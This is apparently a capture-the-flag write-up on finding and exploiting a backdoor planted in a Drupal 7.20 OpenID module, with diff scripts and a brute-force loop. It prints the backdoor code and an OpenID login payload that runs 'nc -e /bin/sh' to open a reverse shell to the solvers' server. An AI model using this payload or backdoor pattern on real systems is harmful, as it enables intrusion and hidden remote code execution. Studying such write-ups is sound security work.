  1. Diff the source against original Drupal in the same version.
  2. Find the backdoor in diffs.
  3. Use the backdoor to own the live website.

Doing the diff

The newest entry in CHANGELOG file was this:

Drupal 7.20, 2013-02-20

After downloading this exact version from the Drupal website and performing a diff (diff -r) on both directories, we quickly found out that there were several global changes ("diff obfuscations", if you will) applied to the "bloat source code":

  • All the comments had been removed.
  • Some variable names per function had been changed to random English words (e.g. $output to $breviary).
  • White-spaces had been randomized.

Of course doing a diff on this turned out to yield lots and lots of false-positives. This called for a fuzzy diff which would ignore the "diff obfuscations"!

We achieved the fuzzy diff the following way (this was made for each "bloat" and original Drupal file):

  • Run php -w on it (-w is "remove comments and whitespaces").
  • Run a python script (source in Appendix A) which:
    • added \n after ) and ;
    • removed { and }
    • changed "\t" "\r" and two spaces to a \n
    • removed additional space after ->
    • removed all variable names

And after this we ran a recursive diff again.
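The normalization steps listed above can be condensed into a short Python 3 sketch. It is a simplified variant of the Appendix A script (a regular expression replaces the manual variable-name loop) and assumes the input has already been passed through php -w; the sample snippets are made up for illustration.

```python
import re

def normalize(php):
    # Break lines after ';' and ')', drop braces.
    text = php.replace(";", ";\n").replace(")", ")\n")
    text = text.replace("{", "").replace("}", "")
    # Tabs, carriage returns and double spaces become line breaks.
    for separator in ("\t", "\r", "  "):
        text = text.replace(separator, "\n")
    text = text.replace("-> ", "->")
    # Strip variable names, keeping only the '$' sigil.
    text = re.sub(r"\$[A-Za-z0-9_]*", "$", text)
    lines = [line.strip() for line in text.split("\n")]
    return "\n".join(line for line in lines if line)

original = "if ($output) {\n\t$output = render($output);\n}"
obfuscated = "if ($breviary) { $breviary = render($breviary); }"
print(normalize(original) == normalize(obfuscated))  # True
print(normalize(obfuscated))
```

Both snippets normalize to the same three lines, so a plain recursive diff no longer reports the renamed variable or the changed whitespace.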

Looking for the backdoor

The diff outputted a 50kB file where most of the changes were either some leftover "diff obfuscations" (a small amount, easily ignored) or changes to .info files (datestamp, "Information added by [drush|drupal]").

Apart from that, there were a couple of meaningful differences, most of which were in the OpenID module (please note this is the "fuzzy" output, so it's kinda unreadable):

openid.inc
diff -r ./bloat/modules/openid/openid.inc \
        ./durpal_same_ver/drupal-7.20/modules/openid/openid.inc
4c4
< define('OPENID_DH_DEFAULT_GEN', '86')
---
> define('OPENID_DH_DEFAULT_GEN', '2')
openid.module
diff -r ./bloat/modules/openid/openid.module \
        ./durpal_same_ver/drupal-7.20/modules/openid/openid.module
184c184
< $ = openid_discovery($)
---
> $ = openid_normalize($)
186,189c186
< if(strpos($, '@')
< )
< list($, $)
< = explode('@', $, 2)
---
> $ = openid_discovery($)
191,192d187
< else $ = false;
< $ = false;
216,221c211
< else $ = _openid_dh_long_to_base64($ * OPENID_DH_DEFAULT_GEN)
< ;
< $['uri'] = drupal_map_assoc(array($)
< , $)
< ;
< if (!empty($['claimed_id'])
---
> else if (!empty($['claimed_id']) 
The thing that was really weird was the OPENID_DH_DEFAULT_GEN set to 86 - after a lot of browsing we came to the conclusion that no one ever changes that value.

Looking into the original "bloat" code revealed these exact changes in the openid.module file (in openid_begin function):
if(strpos($imaginably, '@'))
{
 list($user, $host) = explode('@', $imaginably, 2);
}
else
  {
   $user = false;
   $host = false;
   }
...
$user_enc = _openid_dh_long_to_base64($user * OPENID_DH_DEFAULT_GEN);
  $service['uri'] = drupal_map_assoc(array($host), $user_enc);
It looks quite innocent at first glance. And maybe at the second one too.

The key is the drupal_map_assoc function, which has the following prototype:

drupal_map_assoc($array, $function = NULL)

Parameters
$array: A linear array.
$function: A name of a function to apply to all values before output.

So basically $user_enc contains a function name that will be called with the $host parameter - now this doesn't look innocent at all!

Yes - we found the backdoor.
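To illustrate why this is dangerous, here is a rough Python analogue of the behaviour described by the prototype above. It is not Drupal's code: the REGISTRY dictionary is a hypothetical stand-in for PHP's table of callable function names, and map_assoc only mimics the documented semantics.

```python
def map_assoc(values, function_name=None, registry=None):
    # Map every value to itself, like array_combine($array, $array).
    result = {value: value for value in values}
    func = (registry or {}).get(function_name)
    if callable(func):
        # The named function is applied to every value before output.
        result = {key: func(value) for key, value in result.items()}
    return result

# Hypothetical stand-in for the functions PHP can call by name.
REGISTRY = {"strtoupper": str.upper}

print(map_assoc(["example.org"]))
print(map_assoc(["example.org"], "strtoupper", REGISTRY))
```

If both the function name and the array value come from user input, as $user_enc and $host do here, the caller gets to pick any one-argument function and its argument.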

Exploiting the backdoor

The openid_begin function is easily reachable from the outside - in the Login subpage you choose "Log in using OpenID", and whatever you pass is put in the $imaginably parameter.


Analyzing the changes you can see that $imaginably is split in two on the first "@" character into $user and $host.

The $user is then multiplied by OPENID_DH_DEFAULT_GEN (86), and put to a "long int to base64" function (_openid_dh_long_to_base64), and this is stored in the end in the $user_enc variable, which is passed as the name of the function that is going to be called.

Now the problem is to get the proper integer values for actual functions. After some attempts we settled for a brute force approach (source in Appendix B), which tested different numbers and after a couple of seconds outputted these two:

93802 exec
96141 file

The exec function is exactly what we needed!
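In hindsight the two numbers can also be derived directly instead of brute-forced. The Python sketch below assumes that _openid_dh_long_to_base64 is plain base64 over the big-endian binary form of the number, with a leading zero byte when the top bit is set; that assumption is consistent with the two results above. The helper names are made up for this example.

```python
import base64

GEN = 86  # OPENID_DH_DEFAULT_GEN in the backdoored openid.inc

def long_to_base64(number):
    # Assumed behaviour of _openid_dh_long_to_base64 (see lead-in).
    raw = number.to_bytes(max(1, (number.bit_length() + 7) // 8), "big")
    if raw[0] & 0x80:
        raw = b"\x00" + raw
    return base64.b64encode(raw).decode("ascii")

def user_for_function(name):
    """Return the number to put before '@' so that name gets called, or None."""
    if len(name) % 4 != 0:
        return None  # base64 output always has a length divisible by 4
    value = int.from_bytes(base64.b64decode(name), "big")
    if value % GEN != 0:
        return None  # not reachable through the multiplication by 86
    return value // GEN

print(user_for_function("exec"))    # 93802
print(user_for_function("file"))    # 96141
print(long_to_base64(93802 * GEN))  # exec
```

This also explains why only a few function names are reachable: the name has to be valid base64 of the right length, and the decoded number must be divisible by 86.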

The $host parameter remained unchanged so we could try to "log in" using this OpenID ID:

93802@nc -e /bin/sh our_server_ip 1234

And this resulted in a reverse shell. The rest was a formality:

And that's it! +200 pts :)

Appendix A: Python script for "diff deobfuscation"

import sys
import re

if len(sys.argv) != 2:
 print "usage: go.py "
 sys.exit(1)

f = open(sys.argv[1], "r")
d = f.read()
f.close()

o = ""
o = d.replace(';', ';\n')

# { and } and \t
o = o.replace('{','')
o = o.replace('}','')
o = o.replace('\t','\n')
o = o.replace('\r','\n')
o = o.replace('  ','\n')
o = o.replace('-> ', '->')
o = o.replace(')',')\n')

# Spaces and lines.
o = o.split('\n')
o = map(lambda x: x.strip(), o)
o = filter(lambda x: len(x) > 0, o)
o = '\n'.join(o)

# Variable names.
d = o
o = ""
i = 0
while i < len(d):
 if d[i] != '$':
   o += d[i]
   i += 1
   continue

 o += '$'
 i += 1
 while i < len(d) and d[i] in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_":
   i += 1  

f = open(sys.argv[1], "w")
f.write(o)
f.close()

Appendix B: Number-to-function brute force

Either run this from Drupal, or copy-paste _openid_dh_long_to_base64, its dependencies and the loop below to a new file.
for($i = 0; $i < 123123123; $i += 86) {
 $user_enc = _openid_dh_long_to_base64($i);
 if(function_exists($user_enc)) {
   $j = $i / 86;
   echo "$j $user_enc\n";
 }
}